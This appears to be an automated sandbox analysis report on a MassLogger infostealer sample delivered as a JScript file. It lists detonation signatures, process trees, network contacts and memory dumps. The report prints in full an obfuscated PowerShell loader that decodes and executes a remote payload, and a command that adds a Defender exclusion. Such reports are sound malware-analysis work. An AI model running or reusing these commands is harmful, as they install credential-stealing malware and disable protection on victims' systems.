Analysis Overview
SHA256
9bd9d73577b5a9fe76184efcb1e84cbed087a7e5892a2a2b9fd0d5d1c54b33b1
Threat Level: Known bad
The file script.js was found to be: Known bad.
Malicious Activity Summary
MassLogger
MassLogger Main Payload
Blocklisted process makes network request
Looks up external IP address via web service
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2021-01-12 07:49
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2021-01-12 07:49
Reported
2021-01-12 07:52
Platform
win10v20201028
Max time kernel
17s
Max time network
128s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 576 wrote to memory of 1620 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 576 wrote to memory of 1620 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\script.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $srrYk='D4%C7%72%72%02%E6%96%F6%A6%D2%02%37%27%16%86%34%96%96%36%37%16%42%02%D3%76%E6%96%27%47%35%96%96%36%37%16%42%B3%D7%22%F5%42%87%03%22%D5%56%47%97%26%B5%D5%27%16%86%36%B5%B7%02%47%36%56%A6%26%F4%D2%86%36%16%54%27%F6%64%C7%02%92%72%E5%72%82%47%96%C6%07%37%E2%67%D6%42%02%D3%37%27%16%86%34%96%96%36%37%16%42%B3%92%72%76%07%A6%E2%47%37%F6%86%F2%F6%36%E2%C6%F6%36%47%56%E6%96%37%F2%F2%A3%07%47%47%86%72%C2%46%F6%86%47%56%D4%A3%A3%D5%56%07%97%45%C6%C6%16%34%E2%36%96%37%16%24%C6%16%57%37%96%65%E2%47%66%F6%37%F6%27%36%96%D4%B5%C2%72%76%E6%96%27%47%72%02%B2%02%72%35%46%16%72%02%B2%02%72%F6%C6%E6%72%02%B2%02%72%77%F6%44%72%C2%97%47%47%42%82%56%D6%16%E6%97%24%C6%C6%16%34%A3%A3%D5%E6%F6%96%47%36%16%27%56%47%E6%94%E2%36%96%37%16%24%C6%16%57%37%96%65%E2%47%66%F6%37%F6%27%36%96%D4%B5%02%D3%67%D6%42%B3%92%72%36%96%37%16%24%C6%16%57%37%96%65%E2%47%66%F6%37%F6%27%36%96%D4%72%82%56%D6%16%E4%C6%16%96%47%27%16%05%86%47%96%75%46%16%F6%C4%A3%A3%D5%97%C6%26%D6%56%37%37%14%E2%E6%F6%96%47%36%56%C6%66%56%25%E2%D6%56%47%37%97%35%B5%02%D5%46%96%F6%67%B5%B3%D4%C7%72%92%47%E6%56%72%B2%72%96%C6%34%26%72%B2%72%56%75%E2%47%72%B2%72%56%E4%02%47%36%72%B2%72%56%A6%26%F4%72%B2%72%D2%77%56%E4%82%72%D3%97%47%47%42%B3%23%23%07%42%02%D3%02%C6%F6%36%F6%47%F6%27%05%97%47%96%27%57%36%56%35%A3%A3%D5%27%56%76%16%E6%16%D4%47%E6%96%F6%05%56%36%96%67%27%56%35%E2%47%56%E4%E2%D6%56%47%37%97%35%B5%B3%92%23%73%03%33%02%C2%D5%56%07%97%45%C6%F6%36%F6%47%F6%27%05%97%47%96%27%57%36%56%35%E2%47%56%E4%E2%D6%56%47%37%97%35%B5%82%47%36%56%A6%26%F4%F6%45%A3%A3%D5%D6%57%E6%54%B5%02%D3%02%23%23%07%42%B3%92%76%E6%96%07%42%82%02%C6%96%47%E6%57%02%D7%47%56%96%57%15%D2%02%13%02%47%E6%57%F6%36%D2%02%D6%F6%36%E2%56%C6%76%F6%F6%76%02%07%D6%F6%36%D2%02%E6%F6%96%47%36%56%E6%E6%F6%36%D2%47%37%56%47%02%D3%02%76%E6%96%07%42%B7%02%F6%46%B3%56%E6%F6%26%45%42%02%D4%02%C6%16%37%B3%92%72%94%72%C2%72%E3%72%82%56%36%16%C6%07%56%27%E2%72%85%54%E3%72%D3%56%E6%F6%26%45%42';$text =$srrYk.ToCharArray();[Array]::Reverse($text);$tu=-join $text;$jm=$tu.Split('%') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''| & (-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])}))
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | google.com | udp |
| N/A | 8.8.8.8:53 | sinetcol.co | udp |
| N/A | 144.217.69.137:80 | sinetcol.co | tcp |
Files
memory/1620-2-0x0000000000000000-mapping.dmp
memory/1620-3-0x00007FFE9A660000-0x00007FFE9B04C000-memory.dmp
memory/1620-4-0x000001CF36070000-0x000001CF36071000-memory.dmp
memory/1620-5-0x000001CF507E0000-0x000001CF507E1000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2021-01-12 07:49
Reported
2021-01-12 07:52
Platform
win7v20201028
Max time kernel
31s
Max time network
129s
Command Line
Signatures
MassLogger
MassLogger Main Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1580 wrote to memory of 1932 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1580 wrote to memory of 1932 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1580 wrote to memory of 1932 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\script.js
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $srrYk='D4%C7%72%72%02%E6%96%F6%A6%D2%02%37%27%16%86%34%96%96%36%37%16%42%02%D3%76%E6%96%27%47%35%96%96%36%37%16%42%B3%D7%22%F5%42%87%03%22%D5%56%47%97%26%B5%D5%27%16%86%36%B5%B7%02%47%36%56%A6%26%F4%D2%86%36%16%54%27%F6%64%C7%02%92%72%E5%72%82%47%96%C6%07%37%E2%67%D6%42%02%D3%37%27%16%86%34%96%96%36%37%16%42%B3%92%72%76%07%A6%E2%47%37%F6%86%F2%F6%36%E2%C6%F6%36%47%56%E6%96%37%F2%F2%A3%07%47%47%86%72%C2%46%F6%86%47%56%D4%A3%A3%D5%56%07%97%45%C6%C6%16%34%E2%36%96%37%16%24%C6%16%57%37%96%65%E2%47%66%F6%37%F6%27%36%96%D4%B5%C2%72%76%E6%96%27%47%72%02%B2%02%72%35%46%16%72%02%B2%02%72%F6%C6%E6%72%02%B2%02%72%77%F6%44%72%C2%97%47%47%42%82%56%D6%16%E6%97%24%C6%C6%16%34%A3%A3%D5%E6%F6%96%47%36%16%27%56%47%E6%94%E2%36%96%37%16%24%C6%16%57%37%96%65%E2%47%66%F6%37%F6%27%36%96%D4%B5%02%D3%67%D6%42%B3%92%72%36%96%37%16%24%C6%16%57%37%96%65%E2%47%66%F6%37%F6%27%36%96%D4%72%82%56%D6%16%E4%C6%16%96%47%27%16%05%86%47%96%75%46%16%F6%C4%A3%A3%D5%97%C6%26%D6%56%37%37%14%E2%E6%F6%96%47%36%56%C6%66%56%25%E2%D6%56%47%37%97%35%B5%02%D5%46%96%F6%67%B5%B3%D4%C7%72%92%47%E6%56%72%B2%72%96%C6%34%26%72%B2%72%56%75%E2%47%72%B2%72%56%E4%02%47%36%72%B2%72%56%A6%26%F4%72%B2%72%D2%77%56%E4%82%72%D3%97%47%47%42%B3%23%23%07%42%02%D3%02%C6%F6%36%F6%47%F6%27%05%97%47%96%27%57%36%56%35%A3%A3%D5%27%56%76%16%E6%16%D4%47%E6%96%F6%05%56%36%96%67%27%56%35%E2%47%56%E4%E2%D6%56%47%37%97%35%B5%B3%92%23%73%03%33%02%C2%D5%56%07%97%45%C6%F6%36%F6%47%F6%27%05%97%47%96%27%57%36%56%35%E2%47%56%E4%E2%D6%56%47%37%97%35%B5%82%47%36%56%A6%26%F4%F6%45%A3%A3%D5%D6%57%E6%54%B5%02%D3%02%23%23%07%42%B3%92%76%E6%96%07%42%82%02%C6%96%47%E6%57%02%D7%47%56%96%57%15%D2%02%13%02%47%E6%57%F6%36%D2%02%D6%F6%36%E2%56%C6%76%F6%F6%76%02%07%D6%F6%36%D2%02%E6%F6%96%47%36%56%E6%E6%F6%36%D2%47%37%56%47%02%D3%02%76%E6%96%07%42%B7%02%F6%46%B3%56%E6%F6%26%45%42%02%D4%02%C6%16%37%B3%92%72%94%72%C2%72%E3%72%82%56%36%16%C6%07%56%27%E2%72%85%54%E3%72%D3%56%E6%F6%26%45%42';$text =$srrYk.ToCharArray();[Array]::Reverse($text);$tu=-join $text;$jm=$tu.Split('%') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''| & (-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])}))
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | google.com | udp |
| N/A | 8.8.8.8:53 | sinetcol.co | udp |
| N/A | 144.217.69.137:80 | sinetcol.co | tcp |
| N/A | 8.8.8.8:53 | api.ipify.org | udp |
| N/A | 54.243.164.148:80 | api.ipify.org | tcp |
Files
memory/1932-2-0x0000000000000000-mapping.dmp
memory/1932-3-0x000007FEF5CF0000-0x000007FEF66DC000-memory.dmp
memory/1932-4-0x0000000002300000-0x0000000002301000-memory.dmp
memory/1932-5-0x000000001AAE0000-0x000000001AAE1000-memory.dmp
memory/1932-6-0x00000000025F0000-0x00000000025F1000-memory.dmp
memory/1932-7-0x0000000002340000-0x0000000002341000-memory.dmp
memory/1932-8-0x000000001B6B0000-0x000000001B6B1000-memory.dmp
memory/1932-9-0x000000001C4A0000-0x000000001C4A1000-memory.dmp
memory/1932-10-0x000000001B510000-0x000000001B527000-memory.dmp
memory/1932-12-0x000000001C420000-0x000000001C42D000-memory.dmp
memory/1932-11-0x000000001C410000-0x000000001C418000-memory.dmp
memory/320-13-0x0000000000400000-0x0000000000486000-memory.dmp
memory/320-14-0x000000000048164E-mapping.dmp
memory/320-16-0x0000000000400000-0x0000000000486000-memory.dmp
memory/320-15-0x0000000000400000-0x0000000000486000-memory.dmp
memory/320-17-0x0000000073790000-0x0000000073E7E000-memory.dmp
memory/1924-20-0x0000000000000000-mapping.dmp
memory/1924-22-0x00000000021E0000-0x00000000021E1000-memory.dmp
memory/1924-21-0x0000000073790000-0x0000000073E7E000-memory.dmp
memory/1924-23-0x0000000004770000-0x0000000004771000-memory.dmp
memory/1924-24-0x00000000024D0000-0x00000000024D1000-memory.dmp
memory/1924-25-0x0000000005240000-0x0000000005241000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | 72a81584c6d3eafddfb853586071c343 |
| SHA1 | 1828889b218cd120336ea8fedf0c98be83c08779 |
| SHA256 | 772317d02b2c4e2f488d315c2e0f6966d6b6d3aa9854ce33e7ece198447eb9b0 |
| SHA512 | c50a95053f4c3e1ebc487c9568ac9886f99beb61630fe16ead8ca607b68b3e6fdf28917639014cc349c553b5348b13418610865d6a5b325273da4bd3f3c41537 |
memory/1924-29-0x0000000005FC0000-0x0000000005FC1000-memory.dmp
memory/1924-34-0x00000000060C0000-0x00000000060C1000-memory.dmp
memory/1924-35-0x0000000006120000-0x0000000006121000-memory.dmp
memory/1924-42-0x0000000006280000-0x0000000006281000-memory.dmp
memory/1924-43-0x0000000005F80000-0x0000000005F81000-memory.dmp
memory/1924-58-0x0000000006310000-0x0000000006311000-memory.dmp
memory/1924-57-0x0000000006300000-0x0000000006301000-memory.dmp